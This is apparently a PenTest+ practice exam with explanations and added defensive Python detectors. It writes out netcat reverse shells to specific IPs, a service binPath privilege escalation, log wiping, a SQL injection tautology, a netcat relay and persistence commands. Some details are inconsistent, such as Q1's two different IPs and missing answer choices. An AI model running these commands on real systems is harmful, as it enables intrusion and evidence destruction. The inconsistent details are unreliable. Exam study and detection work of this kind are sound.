CompTIA PenTest+ (PT0-001) Practice test 12
Question 1 of 50
1. Question
You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
sc config schedule start auto
net start schedule
at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What BEST describes what is occurring and what action do you recommend to stop it?
OBJ-3.5: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker's machine at 172.16.34.12 over port 443.
Question 2 of 50
2. Question
Which of the following might be exploited on a Windows server to conduct a privilege escalation?
OBJ-3.5: The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1, and 10 that stores users' passwords. It authenticates local and remote users. The SAM uses cryptographic measures to prevent unauthenticated users from accessing the system but could be cracked offline using a password cracker to determine the administrative user's passwords. Ret2libc, sticky bits, and SUID/SGID programs are Linux-specific privilege escalation techniques.
Question 3 of 50
3. Question
BigCorpData recently had suffered a massive data breach caused by a hacker. You have been hired as an expert to assist in their incident response and recovery. You look through the shell history on a Linux server and see the following entry: # echo " " > /var/log/syslog. Which of the following techniques did the attacker use to attempt to cover their tracks?
OBJ-3.7: The attacker attempted to overwrite the /var/log/syslog file. If this command were successful, they would have overwritten all of the log's contents with a single space character. If the server writes its logs to a centralized Syslog server, the original logs would still be available for review. Additionally, this method does not securely erase the file, and it could be restored from a backup or even from the hard drive using forensic techniques. If the attacker wanted to erase the file securely, they should have used the "shred -zu /var/log/syslog" command. This would overwrite the area of the hard drive that contained the file with zeros for increased security.
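As an added defender-side example (not part of the practice test), the following Python routine shows the integrity check that catches the overwrite above: logs are append-only, so a baseline of size, inode and a hash of the file head makes a blanked, truncated or edited log stand out. The HEAD_BYTES size and the sample log lines are constructed assumptions.

```python
import hashlib
import os
import tempfile

HEAD_BYTES = 4096  # assumption: how much of the log head to fingerprint


def baseline(path):
    """Record size, inode and a SHA-256 of the first HEAD_BYTES of a log file."""
    st = os.stat(path)
    with open(path, "rb") as f:
        head = f.read(HEAD_BYTES)
    return {"size": st.st_size, "inode": st.st_ino,
            "head_sha256": hashlib.sha256(head).hexdigest()}


def check(path, base):
    """Compare the current file with its baseline and return a verdict.

    Because a log only ever grows, any shrink, a blanked head, a replaced
    inode or a changed head is a tampering (or rotation) signal to triage.
    """
    if not os.path.exists(path):
        return "missing"
    st = os.stat(path)
    with open(path, "rb") as f:
        head = f.read(HEAD_BYTES)
    if base["size"] > 0 and head.strip() == b"":
        return "blanked"        # e.g. echo " " > /var/log/syslog
    if st.st_ino != base["inode"]:
        return "replaced"       # rm + recreate (or logrotate, which is expected)
    if st.st_size < base["size"]:
        return "truncated"
    if hashlib.sha256(head).hexdigest() != base["head_sha256"]:
        return "head-modified"  # earlier entries edited in place
    return "ok"


def demo():
    """Constructed walkthrough in a temp dir; returns the verdicts in order."""
    d = tempfile.mkdtemp()
    log = os.path.join(d, "syslog")
    line = "Jan  1 10:00:00 host sshd[4321]: Accepted publickey for alice\n"  # constructed
    with open(log, "w") as f:
        f.write(line * 100)
    base = baseline(log)
    verdicts = []

    with open(log, "a") as f:          # normal operation: appends only
        f.write(line)
    verdicts.append(check(log, base))

    with open(log, "w") as f:          # the attacker's echo " " > /var/log/syslog
        f.write(" \n")
    verdicts.append(check(log, base))

    with open(log, "w") as f:          # partial wipe: fewer lines than before
        f.write(line * 50)
    verdicts.append(check(log, base))

    with open(log, "w") as f:          # in-place edit of the earliest entry
        f.write(line.replace("alice", "mallory") + line * 99)
    verdicts.append(check(log, base))
    return verdicts


if __name__ == "__main__":
    print(demo())
```

Run the baseline from a host that the attacker cannot write to (or ship the baseline off-box), since a baseline stored next to the log can be tampered with just as easily.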
Question 4 of 50
4. Question
Jason is conducting a penetration test against an organization’s Windows network. This engagement aims to demonstrate what a trusted insider could do to the organization’s network. The organization provided Jason with a corporate laptop and a standard user account as an entry-level employee. He was able to download his exploit (exploit.exe) and some programs from SysInternals to his desktop. He then enters the following commands into the command shell from this standard user account:
-=-=-=-=-=-
C:\Users\jason\Desktop> exploit.exe
This program has been blocked by group policy. Contact your administrator to enable this program.
C:\Users\jason\Desktop> accesschk.exe -uwcq "jason" *
RW Apache
C:\Users\jason\Desktop> sc config "Apache" binPath= "net localgroup administrators jason /add"
C:\Users\jason\Desktop> sc stop "Apache"
C:\Users\jason\Desktop> sc start "Apache"
-=-=-=-=-=-
Based on the output above, which of the following types of vulnerabilities is Jason exploiting?
OBJ-3.5: Some Windows services are run with SYSTEM privileges and may have been misconfigured by the administrator. In this case, Jason used the accesschk tool from SysInternals to find any writeable services that his user account could access. One was returned: Apache. He then stopped the service and rewrote the binary path loaded by the service to "net localgroup administrators jason /add", which will be run the next time the service is started. This will add Jason's user account (jason) to the administrators group. Next, he started the service, completing his privilege escalation through the use of writeable services.
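As an added detection example (not part of the practice test), the Python routine below applies the patterns from questions 1 and 4 to constructed process-creation command lines of the kind Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing) record: a scheduled task that launches netcat with -e, and an sc config binPath= change that points a service at a built-in command instead of a service binary. The regexes, rule names and sample lines are assumptions, not from any real product.

```python
import re
from dataclasses import dataclass

# Constructed sample command lines. Lines 1-3 are the Task Scheduler/netcat
# scenario, lines 4-6 the writeable-service scenario; the rest are benign.
SAMPLE_COMMANDS = [
    'sc config schedule start auto',
    'net start schedule',
    'at 10:42 "c:\\temp\\nc.exe 123.12.34.12 443 -e cmd.exe"',
    'accesschk.exe -uwcq "jason" *',
    'sc config "Apache" binPath= "net localgroup administrators jason /add"',
    'sc stop "Apache"',
    'sc config "Spooler" start= demand',
    'schtasks /create /tn Backup /tr "C:\\Tools\\backup.exe" /sc daily /st 02:00',
]


@dataclass
class Finding:
    rule: str
    command: str


# Task creation via the legacy at.exe or schtasks /create.
_TASK_CREATE = re.compile(r'^(at\s+\d{1,2}:\d{2}|schtasks(\.exe)?\s+/create)\b', re.I)
# netcat invoked with -e to hand a shell to the remote side.
_NETCAT_SHELL = re.compile(r'\bnc(64)?(\.exe)?\b.*\s-e\s+\S*(cmd|powershell)', re.I)
# sc config ... binPath= <value>; the value is captured for inspection.
_BINPATH = re.compile(r'\bsc(\.exe)?\s+config\s+.*binpath=\s*"?(?P<path>[^"]+)"?', re.I)
# A binPath that is a built-in command rather than a service executable.
_LOLBIN = re.compile(r'\b(net(\.exe)?\s+(localgroup|user)|cmd(\.exe)?\s*/c|powershell)\b', re.I)
# The Task Scheduler service being switched to automatic start.
_SCHED_ENABLE = re.compile(r'\bsc(\.exe)?\s+config\s+schedule\s+start=?\s*auto\b', re.I)


def analyze(commands):
    """Return one Finding per matched rule, in input order."""
    findings = []
    for cmd in commands:
        if _TASK_CREATE.search(cmd) and _NETCAT_SHELL.search(cmd):
            findings.append(Finding("scheduled-task-reverse-shell", cmd))
        elif _NETCAT_SHELL.search(cmd):
            findings.append(Finding("netcat-exec-shell", cmd))
        m = _BINPATH.search(cmd)
        if m and _LOLBIN.search(m.group("path")):
            findings.append(Finding("service-binpath-hijack", cmd))
        if _SCHED_ENABLE.search(cmd):
            findings.append(Finding("task-scheduler-enabled", cmd))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_COMMANDS):
        print(f"[{f.rule}] {f.command}")
```

The binPath rule is the detection half; the preventive half is the accesschk check itself, run by the administrator to find services whose configuration is writeable by non-administrators before an attacker does.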
Question 5 of 50
5. Question
Which of the following might be exploited on a Linux server to conduct a privilege escalation?
OBJ-3.5: An insecure sudo vulnerability could allow an attacker to circumvent protections and execute commands that would normally require a password, resulting in privilege escalation. Kerberoasting, Cpassword, and DLL hijacking are Windows-specific privilege escalation techniques.
Question 6 of 50
6. Question
During a penetration test, which of the following should you perform if your goal is to conduct a successful whaling attack?
OBJ-3.1: Whaling is a type of spear phishing attack that specifically targets wealthy or powerful individuals. In penetration testing, when the attacker targets a C-level executive (CEO, CFO, CTO, CIO, etc.), this is considered whaling.
Question 7 of 50
7. Question
An attacker was able to gain access to your organization’s network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?
OBJ-3.2: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forces legitimate MAC addresses out of the switch's MAC address table (CAM table) and forces a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch's MAC address table is flooded with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router's broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim's spoofed source IP are broadcast to a computer network using an IP broadcast address.
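As an added detection example (not part of the practice test), the Python routine below counts distinct source MACs per switch port over constructed observations, which is the signal a MAC flood leaves behind: an access port that should carry one or two hosts suddenly sources hundreds of addresses. The port names, MACs and the threshold of 8 are assumptions.

```python
from collections import defaultdict

# Constructed (switch_port, source_mac) observations, as you would get from
# an sFlow/port-mirror feed or periodic exports of the MAC address table.
SAMPLE_OBSERVATIONS = (
    [("Gi1/0/1", "00:11:22:33:44:01")] * 20
    + [("Gi1/0/2", "00:11:22:33:44:02")] * 15
    + [("Gi1/0/2", "00:11:22:33:44:03")] * 5          # PC behind an IP phone: normal
    + [("Gi1/0/7", f"02:00:00:{i >> 8:02x}:{i & 0xff:02x}:aa") for i in range(500)]  # flood
)


def macs_per_port(observations):
    """Map each port to the number of distinct source MACs seen on it."""
    seen = defaultdict(set)
    for port, mac in observations:
        seen[port].add(mac.lower())
    return {port: len(macs) for port, macs in seen.items()}


def flagged_ports(observations, max_macs=8):
    """Ports whose distinct-MAC count exceeds what an access port should carry
    (assumption: 8 allows for phone + PC + a small hypervisor)."""
    counts = macs_per_port(observations)
    return sorted(p for p, n in counts.items() if n > max_macs)


if __name__ == "__main__":
    print(macs_per_port(SAMPLE_OBSERVATIONS))
    print("flooded ports:", flagged_ports(SAMPLE_OBSERVATIONS))
```

The corresponding prevention on Cisco IOS access ports is port security (switchport port-security with a maximum address count and a violation action), which stops the table from being filled in the first place.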
Question 8 of 50
8. Question
You are planning to exploit a network-based vulnerability against a Windows server. You have determined that it is vulnerable to the EternalBlue exploit because the system hasn’t installed the MS17-010 security patch. From your research, you know that this exploit would allow you to conduct arbitrary remote code execution by exploiting a fault in the communication protocol used by Windows file and print servers. Which of the following types of exploits are you planning?
OBJ-3.2: Server Message Block (SMB) allows clients to read from and write to a server service, providing core authentication and communications for Windows file and print servers. The EternalBlue exploit was released in early 2017, and it can be used against Windows (Vista SP2 through Server 2016, both 32-bit and 64-bit versions).
Question 9 of 50
9. Question
While conducting a penetration test against an organization, you created a clone of the login page of the company’s webmail system using the Social Engineer Toolkit (SET). You wait until the Chief Financial Officer (CFO) logs into the website and capture their credentials. Which of the following attacks should you perform next using the CFO’s credentials?
OBJ-3.1: Impersonation is the act of pretending to be someone you are not. Elicitation is the collection or acquisition of data from human beings, usually through deception or social engineering. These two are often used together in an attack. Since the penetration tester is trying to gather the CFO's login credentials, they are likely trying to perform an account takeover to conduct an impersonation attack using a business email compromise (BEC) to elicit some action from personnel within the organization. The Social Engineer Toolkit (SET) is an open-source penetration testing framework included with Kali Linux that supports social engineering to penetrate a network or system.
Question 10 of 50
10. Question
You are reviewing the IDS logs and notice the following log entry:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(where [email protected] and password=' or 7==7')
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of attack is being performed?
OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. The injection of unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.
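As an added example (not part of the practice test), the Python snippet below shows why the always-true 7==7 in that IDS entry works against a concatenated query and not against a parameterized one, plus the narrow tautology heuristic an IDS rule might use. The table, the account, the payload wording and the regex are constructed assumptions; SQLite is used because it accepts == as equality.

```python
import re
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('cfo@example.com', 'S3cret!')")  # constructed
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    # String concatenation: the user's text becomes part of the SQL statement,
    # so a quote and an OR clause rewrite the WHERE condition.
    sql = f"SELECT email FROM users WHERE email='{email}' AND password='{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    # Bound parameters: the driver sends values separately from the statement,
    # so quotes and keywords in the input are compared as data, never parsed.
    sql = "SELECT email FROM users WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchone()


# The tautology from the IDS entry above, with a trailing ''=' so that the
# statement's own closing quote is consumed and the SQL stays well-formed.
PAYLOAD = "' OR 7==7 OR ''='"

# Narrow IDS-style heuristic: a quote, OR, and "x == x" with the same token
# on both sides. It catches 7==7 / 1=1 style input and nothing fancier.
_TAUTOLOGY = re.compile(r"""['"]\s*or\s+(\w+)\s*=+\s*\1\b""", re.I)


def looks_like_tautology(value):
    return bool(_TAUTOLOGY.search(value))


def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "cfo@example.com", PAYLOAD),
        "safe": login_safe(conn, "cfo@example.com", PAYLOAD),
        "flagged": looks_like_tautology(PAYLOAD),
    }


if __name__ == "__main__":
    print(demo())
```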
Question 11 of 50
11. Question
Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT?
OBJ-3.5: An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily, so Sarah will need to conduct endpoint forensics as her most likely method to detect an APT and their associated infections on her systems.
Question 12 of 50
12. Question
What kind of security vulnerability would a newly discovered flaw in a software application be considered?
OBJ-3.1: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and using the check's results and the difference in time passed. This is an example of a race condition.
Question 13 of 50
13. Question
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account’s cached credentials when the user logged into an SSO system?
OBJ-3.2: Pass the Hash (PtH) is the process of harvesting an account's cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.
Question 14 of 50
14. Question
You are scheduled to conduct a physical penetration test against an organization. You need to access the building during business hours and in the evening, even if none of the employees are on-site. Which of the following methods would be the MOST effective to utilize?
OBJ-3.6: Radio-frequency identification (RFID) is a standard for identifying and keeping track of an object's physical location through the use of radio waves. RFID cloning is the act of copying authentication data from an RFID badge's microchip to another badge. In an attack scenario, badge cloning is useful because it enables the attacker to obtain authorization credentials without stealing a physical badge from the organization. Badge cloning can be done through handheld RFID writers, which are inexpensive and easy to use. You hold the badge up to the RFID writer device, press a button to copy its tag's data, then hold a blank badge up to the device, and write the copied data. RFID cloning tools can read the data like any normal RFID reader would and be located up to several feet away or inside a bag.
Question 15 of 50
15. Question
You have been asked to scan your company’s website using the OWASP ZAP tool. When you perform the scan, you receive the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Correct
OBJ-3.4: Since your company owns the website, you can require the developer to implement a bug/code fix to prevent the form from allowing the AUTOCOMPLETE function to work on this website. The code change is simple: add “autocomplete=off” to the code’s first line. The resulting code would be
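The ZAP warning quoted above is a static check: a password-type input whose form does not disable autofill. As an added example that is not part of the practice test, the following Python script performs the same check over a constructed HTML sample (the form ids and field names are invented for illustration), treating a field as exposed only when neither the input nor its enclosing form carries autocomplete="off".

```python
"""Flag password inputs that a browser may autofill: the check behind the ZAP warning."""
from html.parser import HTMLParser

# Constructed sample markup (not from the page). Form "login" leaves autocomplete
# on; "login2" disables it on the <form>; "login3" disables it on the <input>.
SAMPLE_HTML = """
<form id="login" method="post" action="/login">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form id="login2" method="post" action="/login" autocomplete="off">
  <input type="password" name="pass">
</form>
<form id="login3" method="post" action="/login">
  <input type="password" name="pass" autocomplete="off">
</form>
"""


class PasswordAutocompleteChecker(HTMLParser):
    """Collect password inputs where neither the input nor its form sets autocomplete="off"."""

    def __init__(self):
        super().__init__()
        self._forms = []      # stack of (form id, form has autocomplete="off")
        self.findings = []    # (form id or None, input name) for each exposed field

    @staticmethod
    def _autocomplete_off(attrs):
        value = dict(attrs).get("autocomplete")
        return value is not None and value.strip().lower() == "off"

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._forms.append((a.get("id"), self._autocomplete_off(attrs)))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            form_id, form_off = self._forms[-1] if self._forms else (None, False)
            # The field is exposed only if autofill is disabled at neither level.
            if not form_off and not self._autocomplete_off(attrs):
                self.findings.append((form_id, a.get("name")))

    def handle_endtag(self, tag):
        if tag == "form" and self._forms:
            self._forms.pop()


def find_autofillable_password_fields(html):
    """Return [(form id, input name), ...] for password fields the browser may store."""
    checker = PasswordAutocompleteChecker()
    checker.feed(html)
    checker.close()
    return checker.findings


if __name__ == "__main__":
    for form_id, name in find_autofillable_password_fields(SAMPLE_HTML):
        print(f"form {form_id!r}: password input {name!r} has autocomplete enabled")
```

Only the first form is reported. One caveat worth knowing when triaging this finding: current mainstream browsers largely ignore autocomplete="off" on login forms and still offer their own saved passwords, so the attribute satisfies the scanner's check but is a weak control on its own.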
Question 16 of 50
16. Question
A disgruntled employee executes a man-in-the-middle attack on the company network. Layer 2 traffic destined for the gateway is redirected to the employee’s computer. What type of attack is this an example of?
Correct
OBJ-3.2: ARP poisoning reroutes data and allows an attacker to intercept packets intended for another recipient. ARP attacks can be sent from any host on the local area network, and the goal is to associate the attacker’s MAC address with the IP address of another host (here, the gateway) so that any traffic meant for that host is delivered to the attacker’s PC instead.
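From the defender's side, the observable symptom of ARP poisoning is an IP-to-MAC binding that changes, or one MAC answering for several IPs. As an added illustration (not part of the practice test), the following Python function applies those two checks to a constructed list of ARP reply records; the addresses are invented and the thresholds are assumptions.

```python
"""Detect ARP poisoning symptoms in a list of observed ARP replies (constructed data)."""
from collections import defaultdict

# Constructed sample (sender IP, sender MAC) pairs as seen in ARP replies on one LAN.
ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # the real gateway
    ("192.168.1.10", "00:11:22:33:44:0a"),
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # gateway IP now claimed by a second MAC
    ("192.168.1.20", "de:ad:be:ef:00:99"),  # the same MAC also claims another IP
]


def detect_arp_anomalies(replies):
    """Return (ip_conflicts, mac_multi): IPs claimed by more than one MAC, and MACs claiming more than one IP."""
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for ip, mac in replies:
        mac = mac.lower()
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    # An IP answered by two MACs is the classic poisoning signature (the gateway here).
    ip_conflicts = {ip: sorted(macs) for ip, macs in ip_to_macs.items() if len(macs) > 1}
    # One MAC answering for several IPs is the secondary signature of a host in the middle.
    mac_multi = {mac: sorted(ips) for mac, ips in mac_to_ips.items() if len(ips) > 1}
    return ip_conflicts, mac_multi


if __name__ == "__main__":
    conflicts, multi = detect_arp_anomalies(ARP_REPLIES)
    for ip, macs in conflicts.items():
        print(f"ALERT: {ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
    for mac, ips in multi.items():
        print(f"ALERT: {mac} claims {len(ips)} IPs: {', '.join(ips)}")
```

Both checks need a baseline before they are actionable: routers with secondary addresses or first-hop redundancy protocols legitimately answer for several IPs, and a replaced NIC legitimately changes a binding once. Tools in the arpwatch family keep exactly this kind of table and alert on changes to it.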
Question 17 of 50
17. Question
Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?
Correct
OBJ-3.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.
Question 18 of 50
18. Question
You are working as part of a penetration testing team during an engagement. A coworker just entered “New-Service -Name “SkillcertproTrainingApp” -BinaryPathName C:\Windows\temp\WindowsTools.exe” in PowerShell on the Windows server the team exploited. What action is your coworker performing with this command?
Correct
OBJ-3.7: This scenario is using a command to add persistence to a Windows server using PowerShell. The command entered adds a new service named Skillcertpro Training App with the binary listed in the command. This will add persistence to the system by running the Skillcertpro Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.
Question 19 of 50
19. Question
Your network is currently under attack from multiple hosts outside of the network. Which type of attack is most likely occurring?
Correct
OBJ-3.2: A Distributed Denial of Service (DDoS) attack occurs when multiple systems flood the bandwidth or resources of a targeted system or network. DoS and Spoofing attacks originate from a single host, while wardriving is focused on the surveillance and reconnaissance of wireless networks.
Question 20 of 50
20. Question
Which of the following types of attacks occurs when an attacker specifically targets the CEO, CFO, CIO, and other board members during their attack?
Correct
OBJ-3.1: Whaling occurs when the attacker targets the C-level executives (CEO, CFO, CIO, etc.), board members, and other senior executives within the organization.
Question 21 of 50
21. Question
Which of the following commands should be run on a victim’s system to connect to a reverse shell?
Correct
OBJ-4.3: A reverse shell is established when the target machine connects back to an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command “nc -lp 31337” on it. To connect to the attacking machine from the victim machine, you would enter the command “nc 192.168.1.53 31337 -e /bin/sh” on it. A bind shell is established when a victim system “binds” its shell to a local network port. To achieve this using netcat, you should execute the command “nc -lp 31337 -e /bin/sh” on the victim machine. This sets up a listener on the machine on port 31337 and will execute /bin/sh when another machine connects to its listener on port 31337. The attacker would enter the command “nc 192.168.1.53 31337” to connect to the victim’s bind shell.
Question 22 of 50
22. Question
What tool can be used to scan a network to perform vulnerability checks and compliance auditing?
Correct
OBJ-4.2: Nessus is a popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Question 23 of 50
23. Question
A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following output:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ tcpdump -n -i eth0
15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 18060 win 16549
15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following statements is true based on this output?
Correct
OBJ-4.3: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) runs an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is no evidence of an attack against either the server or the client based on this output, since we can only see the headers and not the content being sent between the client and server.
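Reading the three lines by hand is fine for an exam, but an analyst classifying traffic usually wants the same facts extracted mechanically: which endpoint is the server, how many payload bytes went each way, and whether the segments are contiguous. As an added example (not part of the practice test), the Python below parses exactly the line format shown in the question (the older tcpdump style with a bare flag letter and a seq:seq(len) range) and derives those facts from the three packets; the small service-name table is an assumption standing in for /etc/services.

```python
"""Parse tcpdump -n output in the question's format and summarize the conversation."""
import re
from collections import Counter

# The three packets from the question, as printed by "tcpdump -n -i eth0".
TCPDUMP_OUTPUT = """\
15:01:35.170763 IP 10.0.19.121.52497 > 11.154.12.121.ssh: P 105:157(52) ack 18060 win 16549
15:01:35.170776 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 23988:24136(148) ack 157 win 113
15:01:35.170894 IP 11.154.12.121.ssh > 10.0.19.121.52497: P 24136:24380(244) ack 157 win 113
"""

# Matches only TCP data segments in the older "P seq:seq(len) ack N win N" style.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): "
    r"(?P<flags>\S+) (?P<seq_lo>\d+):(?P<seq_hi>\d+)\((?P<len>\d+)\) "
    r"ack (?P<ack>\d+) win (?P<win>\d+)$"
)

# -n suppresses host-name lookups but still prints service names for ports;
# this table (an assumption) maps the common ones back to numbers offline.
SERVICE_PORTS = {"ssh": 22, "http": 80, "https": 443, "domain": 53, "smtp": 25}


def split_endpoint(endpoint):
    """'11.154.12.121.ssh' -> ('11.154.12.121', 22); unknown names are kept as strings."""
    host, port = endpoint.rsplit(".", 1)
    return host, (int(port) if port.isdigit() else SERVICE_PORTS.get(port, port))


def parse_tcpdump(text):
    """Return one dict per recognised data segment; other lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        packets.append({
            "ts": m["ts"],
            "src": split_endpoint(m["src"]),
            "dst": split_endpoint(m["dst"]),
            "flags": m["flags"],
            "seq": (int(m["seq_lo"]), int(m["seq_hi"])),
            "len": int(m["len"]),
            "ack": int(m["ack"]),
            "win": int(m["win"]),
        })
    return packets


def segments_contiguous(packets, src):
    """True if every segment from src starts where the previous one ended (no gap visible)."""
    segs = [p["seq"] for p in packets if p["src"] == src]
    return all(prev[1] == nxt[0] for prev, nxt in zip(segs, segs[1:]))


def summarize(packets):
    """Pick the server (endpoint on a well-known port) and count payload bytes each way."""
    endpoints = {p["src"] for p in packets} | {p["dst"] for p in packets}
    server = next(ep for ep in endpoints if isinstance(ep[1], int) and ep[1] < 1024)
    client = next(ep for ep in endpoints if ep != server)
    by_dir = Counter()
    for p in packets:
        by_dir[(p["src"], p["dst"])] += p["len"]
    # Only headers and segment lengths are visible: no payload was captured,
    # which is why nothing here can show what was sent, only how much.
    return {
        "server": server,
        "client": client,
        "packets": len(packets),
        "client_to_server_bytes": by_dir[(client, server)],
        "server_to_client_bytes": by_dir[(server, client)],
    }


if __name__ == "__main__":
    pk = parse_tcpdump(TCPDUMP_OUTPUT)
    print(summarize(pk))
    print("server segments contiguous:", segments_contiguous(pk, ("11.154.12.121", 22)))
```

On the question's capture this reports the server as 11.154.12.121:22, 52 bytes from client to server and 392 bytes back, and the two server segments as contiguous (24136 ends the first and begins the second). The server's ack of 157 also matches the end of the client's 105:157 segment, which is the normal bookkeeping of an established session rather than a sign of anything unusual.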
Question 24 of 50
24. Question
An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
Correct
OBJ-4.2: Cain and Abel is a popular password cracking tool. It can recover many password types by sniffing network packets and by cracking various password hashes using dictionary, brute-force, and cryptanalysis attacks. It also includes a module for Cisco VPN Client password decoding. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.
Question 25 of 50
25. Question
An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?
Correct
OBJ-4.2: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. The | character pipes the output of the first command into the standard input of the second, so whatever the first netcat receives on port 8080 is handed to the second netcat, which sends it to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (the port normally used for secure SSL/TLS traffic, which firewalls usually permit).
Question 26 of 50
26. Question
You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan, but you don’t have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?
Correct
